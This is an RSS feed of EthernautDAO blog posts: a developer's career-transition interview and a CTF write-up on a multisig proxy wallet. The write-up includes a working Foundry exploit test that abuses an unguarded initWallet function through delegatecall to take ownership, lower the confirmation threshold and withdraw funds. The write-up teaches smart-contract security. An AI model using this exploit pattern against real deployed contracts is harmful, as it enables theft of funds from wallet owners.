<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/">
    <channel>
        <title>EthernautDAO</title>
        <link>https://paragraph.com/@ethernautdao</link>
        <description>A common goods DAO aimed at transforming developers into Ethereum developers.</description>
        <lastBuildDate>Sat, 15 Aug 2026 04:46:46 GMT</lastBuildDate>
        <docs>https://validator.w3.org/feed/docs/rss2.html</docs>
        <generator>https://github.com/jpmonette/feed</generator>
        <language>en</language>
        <image>
            <title>EthernautDAO</title>
            <url>https://storage.googleapis.com/papyrus_images/304dc15bab0f33436a00fca779a94bba43ea1445061a084cf3dc8d97a8335eab.png</url>
            <link>https://paragraph.com/@ethernautdao</link>
        </image>
        <copyright>All rights reserved</copyright>
        <item>
            <title><![CDATA[Ethernaut Wei series presents: Sabnock]]></title>
            <link>https://paragraph.com/@ethernautdao/ethernaut-wei-series-presents-sabnock</link>
            <guid>RWMdRMQHs916erL4Dsgr</guid>
            <pubDate>Thu, 03 Nov 2022 15:45:43 GMT</pubDate>
            <description><![CDATA[A place where developers tell their stories of how they became part of web3.Ethernaut NFT example for donorsDonate and get one of these NTFs here!What did you do before getting into web3?Before getting into web3, I worked as a full-stack developer at an advertising company. A digital consultancy, to be precise. My stack there mainly consisted of Vue, Node.js & Express, AWS, and Docker. On occasion, I would also use PHP/Laravel, Go, and TypeScript. But I was primarily a JS dev. My boss, there ...]]></description>
            <content:encoded><![CDATA[<h2 id="h-a-place-where-developers-tell-their-stories-of-how-they-became-part-of-web3" class="text-3xl font-header !mt-8 !mb-4 first:!mt-0 first:!mb-0">A place where developers tell their stories of how they became part of web3.</h2><figure float="none" data-type="figure" class="img-center" style="max-width: null;"><img src="https://storage.googleapis.com/papyrus_images/9ec2cb26db233a1335f1b9118440bad838f18c590103d867554c65e746d712b4.png" alt="Ethernaut NFT example for donors" blurdataurl="data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACwAAAAAAQABAAACAkQBADs=" nextheight="600" nextwidth="800" class="image-node embed"><figcaption HTMLAttributes="[object Object]" class="">Ethernaut NFT example for donors</figcaption></figure><p>Donate and get one of these NTFs <a target="_blank" rel="noopener noreferrer nofollow ugc" class="dont-break-out" href="http://ethernautdao.io/">here</a>!</p><h2 id="h-what-did-you-do-before-getting-into-web3" class="text-3xl font-header !mt-8 !mb-4 first:!mt-0 first:!mb-0">What did you do before getting into web3?</h2><p>Before getting into web3, I worked as a full-stack developer at an advertising company. A digital consultancy, to be precise. My stack there mainly consisted of Vue, Node.js &amp; Express, AWS, and Docker. On occasion, I would also use PHP/Laravel, Go, and TypeScript. But I was primarily a JS dev. My boss, there was really great and taught me tons of things. I wouldn&apos;t be here now without him. That was the only job I had between graduation from university and working now at Yield Protocol. In university, I was big into infosec and had a slight stint doing memory forensics research for the cybersecurity lab there before the university was shut down due to COVID. I was unable to find a job in the field and went into full-stack.</p><h2 id="h-what-were-the-first-things-you-did-in-web3" class="text-3xl font-header !mt-8 !mb-4 first:!mt-0 first:!mb-0">What were the first things you did in web3?</h2><p>I got into &quot;crypto&quot; in January 2018 but that was only from a trading perspective. It wasn&apos;t really until August 2021 that I began to explore the dev side where I was contracted to build front ends for some NFT projects. That was my introduction and that was what initially triggered my interest in web3. The work I was doing was a lot more fun and rewarding (and profitable also) than what I was doing at my day job. I didn&apos;t want to quit my job there yet because I still felt unprepared to set out on my own. I wanted to learn some more first.</p><h2 id="h-when-and-how-did-you-start-to-think-about-quitting-your-web2-job" class="text-3xl font-header !mt-8 !mb-4 first:!mt-0 first:!mb-0">When and how did you start to think about quitting your web2 job?</h2><p>While the NFT projects I was working on were cool, I didn&apos;t want to quit my job then. At the end of the year, I decided I would spend 2022 diving much deeper into the dev space. And that was exactly what I did. I got pretty involved in crypto Twitter and quickly came across the bigger dev accounts like <a target="_blank" rel="noopener noreferrer nofollow ugc" class="dont-break-out" href="https://twitter.com/gakonst">Georgios</a> and <a target="_blank" rel="noopener noreferrer nofollow ugc" class="dont-break-out" href="https://twitter.com/transmissions11">t11s</a>. Georgios was tweeting a lot about Foundry at the time and I thought it seemed really cool and a good way to embed myself would be learning about it. That was sort of my start, learning about Foundry and getting into the &quot;Foundry circle&quot; on Twitter. I joined the Telegram group, read some blog posts people wrote about it and contributed to the docs. Just small things like that at first. I was retweeting Georgios a lot at the time and one afternoon while working he spontaneously dm&apos;s me and asks me what I&apos;m working on. I was pretty blown away. I couldn&apos;t believe it wasn&apos;t a bot. I had to tell him I wasn&apos;t primarily a crypto dev yet and was still trying to break in. I remember doing a YouTube search shortly thereafter on his name and I found this code review he and <a target="_blank" rel="noopener noreferrer nofollow ugc" class="dont-break-out" href="https://twitter.com/danrobinson">Dan Robinson</a> did with <a target="_blank" rel="noopener noreferrer nofollow ugc" class="dont-break-out" href="https://twitter.com/alcueca">Alberto</a>, our lead dev at <a target="_blank" rel="noopener noreferrer nofollow ugc" class="dont-break-out" href="https://twitter.com/yield">Yield</a>. That was how I first learned of Yield Protocol. About a month later, this Twitter user, <a target="_blank" rel="noopener noreferrer nofollow ugc" class="dont-break-out" href="https://twitter.com/Deor">Deor</a>, makes a Discord server for crypto devs and I join it. One of the members there was <a target="_blank" rel="noopener noreferrer nofollow ugc" class="dont-break-out" href="https://twitter.com/devtooligan">devtooligan</a> who also did a mentorship with Ethernaut and works at Yield. He had posted there sometime later that Yield would be starting another mentorship session soon. I knew that Yield was pretty small but had very talented devs and some strong backing. I had already applied to some positions previously but didn&apos;t get hired. There was something about Yield that really struck me. Before getting my CS degree I was actually an Econ major for a time and was really into that and finance and such. So I was always more interested in DeFi than NFTs, for better or worse. With Yield, I felt like that was the golden opportunity I was looking for. At the same time, my work at my regular job was becoming pretty sluggish. My boss was becoming a lot busier and so I couldn&apos;t glean as much insight from him anymore. My position there just wound up becoming increasingly untenable. I disliked an environment where I&apos;m not constantly growing and learning new things. I still didn&apos;t feel quite prepared, but the Yield mentorship combined with my work environment was what triggered the realization that it was time for me to make the switch.</p><h2 id="h-how-did-you-hear-about-ethernautdao" class="text-3xl font-header !mt-8 !mb-4 first:!mt-0 first:!mb-0">How did you hear about EthernautDAO?</h2><p>I believe I first heard about it in a comment <a target="_blank" rel="noopener noreferrer nofollow ugc" class="dont-break-out" href="https://twitter.com/DCbuild3r">dcbuilder</a> made on Twitter. I joined the Discord server back then but wasn&apos;t active at all until the Yield mentorship.</p><h2 id="h-have-you-applied-for-a-mentorship" class="text-3xl font-header !mt-8 !mb-4 first:!mt-0 first:!mb-0">Have you applied for a mentorship?</h2><p>Yes, I applied for the Yield mentorship in the Ethernaut Discord immediately as it was made available. Interesting story behind that. I had actually messaged devtooligan right after he posted about it telling him I really wanted it and would do whatever it took to get it. And we both simultaneously came to the conclusion that I could start making small open-source contributions to Yield being that I had virtually no previous experience as a smart contract developer. And that was what I did. Fortunately, there were some pretty small issues that I was able to open PR&apos;s for. Yield wanted to switch the testing suite they used for vault-v2 to Foundry which as it turned out I was perfectly suited for and that was my first major contribution to Yield. So by the time the mentorship rolled around, I had already &quot;front-run&quot; much of the competition so to speak. It also didn&apos;t hurt that I was an experienced dev (albeit somewhat junior) with an active GitHub either. So when Yield announced the six mentees they chose, I was one of them.</p><h2 id="h-how-did-it-feel-did-you-work-and-get-mentored-at-the-same-time" class="text-3xl font-header !mt-8 !mb-4 first:!mt-0 first:!mb-0">How did it feel? Did you work and get mentored at the same time?</h2><p>Yes. The way the mentorship worked is we had ten assignments of increasing complexity which we built. The first was a small name registry and they grew in complexity to include things like an EIP-4626 compliant tokenized vault to a flash loan server and an AMM. But several of the mentees would be given small tasks to work on for Yield at the same time. I don&apos;t think any of us actually finished all ten of them before we started working on other things. I would work on converting some of the Foundry tests between doing some of the mentorship assignments. Eventually, I was given a task to build an integration with another protocol and from then on I didn&apos;t focus on the mentorship anymore.</p><h2 id="h-if-you-have-transitioned-to-web3-full-time-how-different-is-it-from-your-previous-career" class="text-3xl font-header !mt-8 !mb-4 first:!mt-0 first:!mb-0">If you have transitioned to web3 full-time, how different is it from your previous career?</h2><p>It&apos;s enormously different. I don&apos;t have to spend over an hour a day driving to and from work anymore when I can just work remotely is one thing I&apos;m personally very happy about. But the main thing that appeals to me is the people and the culture. Yield is very laid back but all the devs are also top-notch and always learning something or ready to help you learn something and I find that to be a very productive environment. That&apos;s what I like about it most. I&apos;ve tried to study some of the work habits of other protocols and I&apos;m actually a bit shocked that I haven&apos;t found one that I prefer more to Yield&apos;s. Our GitHub is very organized. We respond to issues and PR&apos;s in a timely manner. We&apos;re always designing new patterns to use for our codebase. Integrating with new protocols. Implementing new technologies into our stack like Foundry. Anyone can ask questions or make suggestions and have them considered. It&apos;s a really great environment. I really love getting to work with Alberto who I believe is one of the very best devs in the space. I&apos;ve been working for Yield exclusively since May and in that time, he&apos;s taught me an enormous amount yet I still feel like I&apos;ve barely scratched the surface. And devooligan is constantly learning and growing. From smart contract security to now Huff, he digests new things at a dizzying pace I struggle to keep up with though I continue to try nonetheless. But to sum up very good culture, and a very good team. I couldn&apos;t ask for anything more. I&apos;m not sure there&apos;s anything else I&apos;d rather be doing right now than working at Yield.</p><h2 id="h-what-advice-would-you-give-to-web3-curious-devs" class="text-3xl font-header !mt-8 !mb-4 first:!mt-0 first:!mb-0">What advice would you give to web3-curious devs?</h2><p>The best advice I think is to do what I did and hop in. Just embed yourself with the community. There are tons of genius devs in the space to learn from. All you really have to do is find them and put in the time. And all the code is open source so if you want to contribute or learn how something works, you can literally just do that. And if you have questions you can just go to Discord or dm the devs on Twitter and just ask. You can&apos;t do that for any other community. You just have to hang out and learn for a while before you set out on your own and decide what you want to do. It&apos;s important to make friends and learn. I mention a lot of people above (Georgios, Alberto, devtooligan, Deor, dcbuilder) all of whom had some contribution, small or large, to getting me where I am now and that is a large part of the success I&apos;ve had and how I got started at Yield.</p><p>Follow Sabnock on Twitter:</p><p><a target="_blank" rel="noopener noreferrer nofollow ugc" class="dont-break-out" href="https://twitter.com/Sabnock66">https://twitter.com/Sabnock66</a></p><p><em>EthernautDAO offers free mentorships to experienced web2 devs trying to break into web3. If you like this idea, check out the available mentorships in the EthernautDAO </em><a target="_blank" rel="noopener noreferrer nofollow ugc" class="dont-break-out" href="https://discord.gg/RQ5WYDxUF3"><em>Discord</em></a><em> and follow us on </em><a target="_blank" rel="noopener noreferrer nofollow ugc" class="dont-break-out" href="https://twitter.com/EthernautDAO"><em>Twitter</em></a><em> to get notified when a new mentorship is available.</em></p>]]></content:encoded>
            <author>ethernautdao@newsletter.paragraph.com (EthernautDAO)</author>
            <enclosure url="https://storage.googleapis.com/papyrus_images/3107d4115672ac2b4aeec9ca2882ac546f26c4c336c711c96285fd95f52e192b.png" length="0" type="image/png"/>
        </item>
        <item>
            <title><![CDATA[Safe space, a place to be vulnerable]]></title>
            <link>https://paragraph.com/@ethernautdao/safe-space-a-place-to-be-vulnerable</link>
            <guid>qpBYnBC8IKCXDBgpJ7Ny</guid>
            <pubDate>Fri, 15 Jul 2022 17:32:20 GMT</pubDate>
            <description><![CDATA[ΞthernautDAO is common goods DAO aimed at transforming developers into Ethereum developers. Author: https://twitter.com/StErMi They started releasing CTF challenges on Twitter, so how couldn’t I start solving them?CTF 2: WalletThe challenge starts with this Tweet: https://twitter.com/EthernautDAO/status/1546101932040790016?ref_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1546101932040790016%7Ctwgr%5E%7Ctwcon%5Es1_&ref_url=https%3A%2F%2Fcdn.embedly.com%2Fwidgets%2Fmedia.html%3Ftype%3Dtext2...]]></description>
            <content:encoded><![CDATA[<figure float="none" data-type="figure" class="img-center" style="max-width: null;"><img src="https://storage.googleapis.com/papyrus_images/08c74fd63c9fb0327f73dc1ccf3372a489331b4e1690c7f0bb032c90a87185c7.jpg" alt="" blurdataurl="data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACwAAAAAAQABAAACAkQBADs=" nextheight="600" nextwidth="800" class="image-node embed"><figcaption HTMLAttributes="[object Object]" class="hide-figcaption"></figcaption></figure><p><a target="_blank" rel="noopener noreferrer nofollow ugc" class="dont-break-out" href="https://twitter.com/EthernautDAO">ΞthernautDAO</a> is common goods DAO aimed at transforming developers into Ethereum developers.</p><p>Author:</p><p><a target="_blank" rel="noopener noreferrer nofollow ugc" class="dont-break-out" href="https://twitter.com/StErMi">https://twitter.com/StErMi</a></p><p>They started releasing CTF challenges on Twitter, so how couldn’t I start solving them?</p><h2 id="h-ctf-2-wallet" class="text-3xl font-header !mt-8 !mb-4 first:!mt-0 first:!mb-0">CTF 2: Wallet</h2><p>The challenge starts with this Tweet:</p><p><a target="_blank" rel="noopener noreferrer nofollow ugc" class="dont-break-out" href="https://twitter.com/EthernautDAO/status/1546101932040790016?ref_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1546101932040790016%7Ctwgr%5E%7Ctwcon%5Es1_&amp;ref_url=https%3A%2F%2Fcdn.embedly.com%2Fwidgets%2Fmedia.html%3Ftype%3Dtext2Fhtmlkey%3Da19fcc184b9711e1b4764040d3dc5c07schema%3Dtwitterurl%3Dhttps3A%2F%2Ftwitter.com%2Fethernautdao%2Fstatus%2F1546101932040790016image%3Dhttps3A%2F%2Fi.embed.ly%2F1%2Fimage3Furl3Dhttps253A252F252Fabs.twimg.com252Ferrors252Flogo46x38.png26key3Da19fcc184b9711e1b4764040d3dc5c07">https://twitter.com/EthernautDAO/status/1546101932040790016?ref_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1546101932040790016%7Ctwgr%5E%7Ctwcon%5Es1_&amp;ref_url=https%3A%2F%2Fcdn.embedly.com%2Fwidgets%2Fmedia.html%3Ftype%3Dtext2Fhtmlkey%3Da19fcc184b9711e1b4764040d3dc5c07schema%3Dtwitterurl%3Dhttps3A%2F%2Ftwitter.com%2Fethernautdao%2Fstatus%2F1546101932040790016image%3Dhttps3A%2F%2Fi.embed.ly%2F1%2Fimage3Furl3Dhttps253A252F252Fabs.twimg.com252Ferrors252Flogo46x38.png26key3Da19fcc184b9711e1b4764040d3dc5c07</a></p><p>For this challenge, we have two different smart contracts to review:</p><p><a target="_blank" rel="noopener noreferrer nofollow ugc" class="dont-break-out" href="https://goerli.etherscan.io/address/0x43ff315d0003365fe1246344115a3142b9ebfe0b#code">WalletLibrary</a>: A multisig wallet library</p><blockquote><p>Only deployed once, proxy contracts execute the functions via delegatecall Owners can:</p><ul><li><p><em>Submit a transaction</em></p></li><li><p><em>Approve and revoke approval of pending transactions</em></p></li><li><p><em>Anyone can execute a transaction after enough owners approved it</em></p></li></ul><p>Wallet: A lightweight multisig wallet contract</p><p>Calls will be delegated to the wallet library contract Owners can:</p><ul><li><p><em>Submit a transaction</em></p></li><li><p><em>Approve and revoke approval of pending transactions</em></p></li><li><p><em>Anyone can execute a transaction after enough owners approved it</em></p></li></ul></blockquote><p>At the moment of deployment, the <code>Wallet</code> the contract has three different owners and <code>numConfirmationsRequired</code> is equal to two. This means that to execute a transaction from the wallet, at least two owners have to approve that transaction.</p><p>Our goal is to be able to add <strong>ourselves</strong> to the list of owners and execute a transaction.</p><h2 id="h-study-the-contracts" class="text-3xl font-header !mt-8 !mb-4 first:!mt-0 first:!mb-0">Study the contracts</h2><p>Let’s review the logic of the contracts. The <code>Wallet</code> contract is a lightweight multisig wallet contract. When the users interact with it, two things can happen:</p><ol><li><p>If someone (anyone) sends some funds to it, the <code>receive</code> function will be triggered and those ethers will be stored in the contract&apos;s balance 2) Anything else, any function call, will be handled by the <code>fallback</code> function. This special function will forward the call to the <strong>implementation</strong> contract via <code>delegatecall</code>.</p></li></ol><p>In practice, <code>Wallet</code> is just an implementation of the <a target="_blank" rel="noopener noreferrer nofollow ugc" class="dont-break-out" href="https://github.com/OpenZeppelin/openzeppelin-contracts/blob/master/contracts/proxy/Proxy.sol">OpenZeppelin Proxy</a> contract with some modification to automatically call the <code>initWallet</code> function on the implementation contract.</p><p>One thing that is important to always check is that the storage layout of the proxy and implementation will match. Because the implementation (<code>WalletLibrary</code>) will execute the logic code on the proxy&apos;s layout (<code>Wallet</code>) it&apos;s fundamental that they have the same storage layout. Otherwise, the implementation will <strong>read and write from the wrong variables</strong>!</p><p>I think that before anything we should understand two things 2. Why do we need Proxy Pattern, and what is it? 2) How <code>delegatecall</code> works and how it&apos;s used in the Proxy Pattern</p><h2 id="h-proxy-pattern" class="text-3xl font-header !mt-8 !mb-4 first:!mt-0 first:!mb-0">Proxy Pattern</h2><p>I think that anyone here knows that when you have deployed a Contract in the blockchain, you cannot override its code, right?</p><p>You can’t do what you usually do in the web2 worlds where if you find a bug, or you want to add a new feature you just write down the code, create some tests and then deploy it in production.</p><p>You can’t do that with the current Ethereum implementation. So, what if I would like to fix a bug in my code, or I would like to add a new feature?</p><p>The answer is the <strong>Proxy Pattern</strong>. The basic idea is this:</p><ol><li><p>The proxy will store the address of the implementation and the storage of the contract</p></li><li><p>Any call to the contract itself will not directly interact with the contract, but will be forwarded via <code>delegatecall</code> to the implementation contract</p></li><li><p>The implementation contract contains all the implementation logic that will modify the proxy state variables</p></li><li><p>If you find a bug in the implementation, or you want to add a new feature, you just need to update the code of the implementation, deploy the new contract and update the address of the implementation contract that you have stored in the Proxy contract. Now all the calls to the proxy will be forwarded to the new implementation!</p></li></ol><p>Now things are <strong>much more complicated</strong> than this and there are <strong>tons of security concerns</strong> that you must be aware of. I highly suggest you read some articles online and watch some videos made by Tincho Abbate because he explains this concept very, very well. When things get complicated like this, it is easy to make some mistakes!</p><p>So, we now have some basic knowledge about the proxy pattern but as we understood everything is based on the concept of <code>delegatecall</code>. How does it work?</p><h3 id="h-delegatecall" class="text-2xl font-header !mt-6 !mb-4 first:!mt-0 first:!mb-0">delegatecall</h3><p><code>delegatecall</code> is a <strong>special</strong> opcode from EVM. Let&apos;s learn more about it from the Solidity Documentation:</p><blockquote><p>The code at the target address is executed in the context (i.e. at the address) of the calling contract and <code>msg.sender</code> and <code>msg.value</code> do not change their values. This means that a contract can dynamically load code from a different address at runtime. Storage, current address and balance still refer to the calling contract, only the code is taken from the called address.</p></blockquote><p>What does it mean? Let’s use our contract as an example. When you try to execute <code>initWallet</code> on the <code>Wallet</code> contract, solidity will not find that function inside the code and will execute the <code>fallback</code> function. The <code>fallback</code> function will execute <code>delegatecall</code> toward the <code>WalletLibrary</code> contract, forwarding the whole operation.</p><p>This means that the code that is executed is inside <code>WalletLibrary</code> but the <strong>context</strong> used is the one from the <code>Wallet</code> contract. By this, I mean that <code>msg.sender</code>, <code>msg.value</code> and the <strong>storage</strong> is the one from the <code>Wallet</code> call.</p><p>Basically, it’s like if <code>WalletLibrary</code> will execute its code but on the <code>Wallet</code> contract. Any to a state variable be read and write on the <code>Wallet</code> storage!</p><h2 id="h-the-flow" class="text-3xl font-header !mt-8 !mb-4 first:!mt-0 first:!mb-0">The flow</h2><p>Now that we know the basics of proxy and delegate calls, we can start reviewing the code and understand how it works.</p><p>When the <code>Wallet</code> contract is deployed, the <code>constructor</code> is executed</p><pre data-type="codeBlock" text="constructor(
    address _walletLibrary,
    address[] memory _owners,
    uint256 _numConfirmationsRequired
) {
    walletLibrary = _walletLibrary;    (bool success, ) = _walletLibrary.delegatecall(
        abi.encodeWithSignature(&quot;initWallet(address[],uint256)&quot;, _owners, _numConfirmationsRequired)
    );    require(success, &quot;initWallet failed&quot;);
}
"><code><span class="hljs-function"><span class="hljs-keyword">constructor</span>(<span class="hljs-params">
    <span class="hljs-keyword">address</span> _walletLibrary,
    <span class="hljs-keyword">address</span>[] <span class="hljs-keyword">memory</span> _owners,
    <span class="hljs-keyword">uint256</span> _numConfirmationsRequired
</span>) </span>{
    walletLibrary <span class="hljs-operator">=</span> _walletLibrary;    (<span class="hljs-keyword">bool</span> success, ) <span class="hljs-operator">=</span> _walletLibrary.<span class="hljs-built_in">delegatecall</span>(
        <span class="hljs-built_in">abi</span>.<span class="hljs-built_in">encodeWithSignature</span>(<span class="hljs-string">"initWallet(address[],uint256)"</span>, _owners, _numConfirmationsRequired)
    );    <span class="hljs-built_in">require</span>(success, <span class="hljs-string">"initWallet failed"</span>);
}
</code></pre><p>it sets up the <code>walletLibrary</code> address (the implementation of the contract), and will call <code>initWallet</code> on the <code>walletLibrary</code> via <code>delegatecall</code>. After that, it will check if the operation has been executed successfully; otherwise, it will revert.</p><p>After the initialization, <code>owners</code> will be able to use the multisig wallet by executing these functions:</p><ul><li><p><code>submitTransaction</code> to propose a transaction</p></li><li><p><code>confirmTransaction</code> to confirm a proposed transaction. At least <code>numConfirmationsRequired</code> confirmations are needed to be able to execute the transaction</p></li><li><p><code>revokeConfirmation</code> to revoke a confirmation to a transaction</p></li><li><p><code>executeTransaction</code> to execute a transaction that has at least <code>numConfirmationsRequired</code> confirmations</p></li></ul><h2 id="h-initwallet-function" class="text-3xl font-header !mt-8 !mb-4 first:!mt-0 first:!mb-0"><code>initWallet</code> function</h2><p>Let’s review how the <code>Wallet</code> contract is set up by the <code>initWallet</code> function</p><pre data-type="codeBlock" text="function initWallet(address[] memory _owners, uint256 _numConfirmationsRequired) public {
    // console.log(&quot;initWallet&quot;, _numConfirmationsRequired);    require(_owners.length &gt; 0, &quot;owners required&quot;);
    require(
        _numConfirmationsRequired &gt; 0 &amp;&amp; _numConfirmationsRequired &lt;= _owners.length,
        &quot;invalid number of confirmations&quot;
    );    for (uint256 i = 0; i &lt; _owners.length; i++) {
        address owner = _owners[i];        require(owner != address(0), &quot;invalid owner&quot;);
        require(!isOwner[owner], &quot;owner not unique&quot;);        isOwner[owner] = true;
        owners.push(owner);
    }    numConfirmationsRequired = _numConfirmationsRequired;
}
"><code><span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">initWallet</span>(<span class="hljs-params"><span class="hljs-keyword">address</span>[] <span class="hljs-keyword">memory</span> _owners, <span class="hljs-keyword">uint256</span> _numConfirmationsRequired</span>) <span class="hljs-title"><span class="hljs-keyword">public</span></span> </span>{
    <span class="hljs-comment">// console.log("initWallet", _numConfirmationsRequired);    require(_owners.length > 0, "owners required");</span>
    <span class="hljs-built_in">require</span>(
        _numConfirmationsRequired <span class="hljs-operator">></span> <span class="hljs-number">0</span> <span class="hljs-operator">&#x26;</span><span class="hljs-operator">&#x26;</span> _numConfirmationsRequired <span class="hljs-operator">&#x3C;</span><span class="hljs-operator">=</span> _owners.<span class="hljs-built_in">length</span>,
        <span class="hljs-string">"invalid number of confirmations"</span>
    );    <span class="hljs-keyword">for</span> (<span class="hljs-keyword">uint256</span> i <span class="hljs-operator">=</span> <span class="hljs-number">0</span>; i <span class="hljs-operator">&#x3C;</span> _owners.<span class="hljs-built_in">length</span>; i<span class="hljs-operator">+</span><span class="hljs-operator">+</span>) {
        <span class="hljs-keyword">address</span> owner <span class="hljs-operator">=</span> _owners[i];        <span class="hljs-built_in">require</span>(owner <span class="hljs-operator">!</span><span class="hljs-operator">=</span> <span class="hljs-keyword">address</span>(<span class="hljs-number">0</span>), <span class="hljs-string">"invalid owner"</span>);
        <span class="hljs-built_in">require</span>(<span class="hljs-operator">!</span>isOwner[owner], <span class="hljs-string">"owner not unique"</span>);        isOwner[owner] <span class="hljs-operator">=</span> <span class="hljs-literal">true</span>;
        owners.<span class="hljs-built_in">push</span>(owner);
    }    numConfirmationsRequired <span class="hljs-operator">=</span> _numConfirmationsRequired;
}
</code></pre><p>The code will</p><ul><li><p>check that at least one <code>owner</code> for the wallet is provided</p></li><li><p>the <code>_numConfirmationsRequired</code> required to confirm a transaction is lower or equal to the number of <code>_owners</code> provided otherwise the logic would stop working. You would not be able to execute a transaction if the number of confirmations needed is higher than the number of addresses that can confirm</p></li><li><p>check that each owner is not the <code>address(0)</code> and that they are <strong>unique</strong></p></li><li><p>set up the <code>onwers</code> array and the <code>isOwner</code> mapping</p></li></ul><p>From a logical point, I see that there’s already a problem. There’s no way to revoke an existing <code>owner</code> from the list of addresses that can interact with the wallet. What if one of the owners gets compromised or is a bad actor from the start? There is no way to revoke his/her access to the wallet!</p><p>Apart from that, do you see the <strong>huge</strong> security problem? Usually, in a proxy contract, you want to have a <strong>guard</strong> variable that prevents anyone from calling again the initialization function. In this function, there is no guard at all. What are the consequences of this flaw?</p><p>Well, anyone could call again and again <code>wallet.initWallet</code> that will call via <code>delegatecall</code> <code>walletLibrary.initWallet</code> that will write in the <code>Wallet</code> storage passing arbitrary values.</p><p>This means not only that I would be able to add my own address in the list of the <code>owners</code> but also that I&apos;m able to override the <code>numConfirmationsRequired</code> variable and setting it to <strong>one</strong>.</p><p>This means that in just <strong>one single transaction</strong> I’m able to</p><ul><li><p>add me to the list of the owners</p></li><li><p>set <code>numConfirmationsRequired</code> to 1 so only one confirmation is needed to execute a transaction</p></li><li><p>create a transaction to transfer the <code>wallet</code> ETH funds (or transfer ERC20/ERC1155/ERC721 tokens)</p></li><li><p>confirm it</p></li><li><p>execute it</p></li></ul><p>Let’s see how it is possible in the solution part.</p><h2 id="h-solution-code" class="text-3xl font-header !mt-8 !mb-4 first:!mt-0 first:!mb-0">Solution code</h2><p>Now what we have to do is:</p><ul><li><p>Create an Alchemy or Infura account to be able to fork the Goerli blockchain</p></li><li><p>Choose a good block from which we can create a fork. Any block after the creation of the contract will be good</p></li><li><p>Run a foundry test that will use the fork to execute the test</p></li></ul><p>Here’s the code that I used for the test:</p><pre data-type="codeBlock" text="// SPDX-License-Identifier: Unlicense
pragma solidity ^0.8.13;import &quot;./utils/BaseTest.sol&quot;;
import &quot;src/Wallet.sol&quot;;
import &quot;src/WalletLibrary.sol&quot;;contract WalletTest is BaseTest {
    Wallet private wallet;
    WalletLibrary private walletLibrary;    constructor() {
        string[] memory userLabels = new stringUnsupported embed;
        userLabels[0] = &quot;Alice&quot;;
        userLabels[1] = &quot;Bob&quot;;
        preSetUp(2, 100 ether, userLabels);
    }    function setUp() public override {
        // Call the BaseTest setUp() function that will also create testsing accounts
        super.setUp();        // Attach the contract to the addresses on the fork
        wallet = Wallet(payable(0x19c80e4Ec00fAAA6Ca3B41B17B75f7b0F4D64CB7));
        walletLibrary = WalletLibrary(payable(0x43FF315d0003365fe1246344115A3142b9EBfe0b));        vm.label(address(wallet), &quot;Wallet&quot;);
        vm.label(address(walletLibrary), &quot;WalletLibrary&quot;);        // We are funding the Wallet contract with 1 wei just to test the transaction that will allow us to withdraw from it!
        vm.deal(address(wallet), 1);
    }    function testTakeOwnership() public {
        address player = users[0];
        vm.startPrank(player);        // prepare the attack
        address[] memory owners = new addressUnsupported embed;
        owners[0] = player;        // call the `wallet.fallback` function passing the correct data to make it make a
        // delegatecall to walletLibrary that will execute initWallet on Wallet&apos;s context
        // initWallet should be protected by a flag that check if the contract has been initialized or not
        // like require(owners.length == 0)
        // by doing so we have been added to the list of owners
        // but we can execute any transaction we want because we have lowered the amount of needed confirmation request
        // required to only 1
        (bool success, ) = address(wallet).call(abi.encodeWithSignature(&quot;initWallet(address[],uint256)&quot;, owners, 1));        assertEq(success, true);
        assertEq(wallet.numConfirmationsRequired(), 1);
        assertEq(wallet.owners(3), player);        // Now I&apos;m one of the owners and because numConfirmationsRequired = 1 I can execute tx
        // Let&apos;s create a transaction.
        (success, ) = address(wallet).call(
            abi.encodeWithSignature(&quot;submitTransaction(address,uint256,bytes)&quot;, player, 1, &quot;&quot;)
        );
        assertEq(success, true);        // Confirm the transaction we just created
        // At the moment of the creation of our transaction the transaction array was empty
        // So our txIndex is 0
        uint256 txIndex = 0;
        (success, ) = address(wallet).call(abi.encodeWithSignature(&quot;confirmTransaction(uint256)&quot;, txIndex));
        assertEq(success, true);        // Execute the transaction
        uint256 playerBalanceBefore = player.balance;
        (success, ) = address(wallet).call(abi.encodeWithSignature(&quot;executeTransaction(uint256)&quot;, txIndex));
        assertEq(success, true);        // Assert that we have received 1 wei from the Wallet contract
        assertEq(playerBalanceBefore + 1, player.balance);        vm.stopPrank();
    }
}
"><code><span class="hljs-comment">// SPDX-License-Identifier: Unlicense</span>
<span class="hljs-meta"><span class="hljs-keyword">pragma</span> <span class="hljs-keyword">solidity</span> ^0.8.13;</span><span class="hljs-keyword">import</span> <span class="hljs-string">"./utils/BaseTest.sol"</span>;
<span class="hljs-keyword">import</span> <span class="hljs-string">"src/Wallet.sol"</span>;
<span class="hljs-keyword">import</span> <span class="hljs-string">"src/WalletLibrary.sol"</span>;<span class="hljs-class"><span class="hljs-keyword">contract</span> <span class="hljs-title">WalletTest</span> <span class="hljs-keyword">is</span> <span class="hljs-title">BaseTest</span> </span>{
    Wallet <span class="hljs-keyword">private</span> wallet;
    WalletLibrary <span class="hljs-keyword">private</span> walletLibrary;    <span class="hljs-function"><span class="hljs-keyword">constructor</span>(<span class="hljs-params"></span>) </span>{
        <span class="hljs-keyword">string</span>[] <span class="hljs-keyword">memory</span> userLabels <span class="hljs-operator">=</span> <span class="hljs-keyword">new</span> stringUnsupported embed;
        userLabels[<span class="hljs-number">0</span>] <span class="hljs-operator">=</span> <span class="hljs-string">"Alice"</span>;
        userLabels[<span class="hljs-number">1</span>] <span class="hljs-operator">=</span> <span class="hljs-string">"Bob"</span>;
        preSetUp(<span class="hljs-number">2</span>, <span class="hljs-number">100</span> <span class="hljs-literal">ether</span>, userLabels);
    }    <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">setUp</span>(<span class="hljs-params"></span>) <span class="hljs-title"><span class="hljs-keyword">public</span></span> <span class="hljs-title"><span class="hljs-keyword">override</span></span> </span>{
        <span class="hljs-comment">// Call the BaseTest setUp() function that will also create testsing accounts</span>
        <span class="hljs-built_in">super</span>.setUp();        <span class="hljs-comment">// Attach the contract to the addresses on the fork</span>
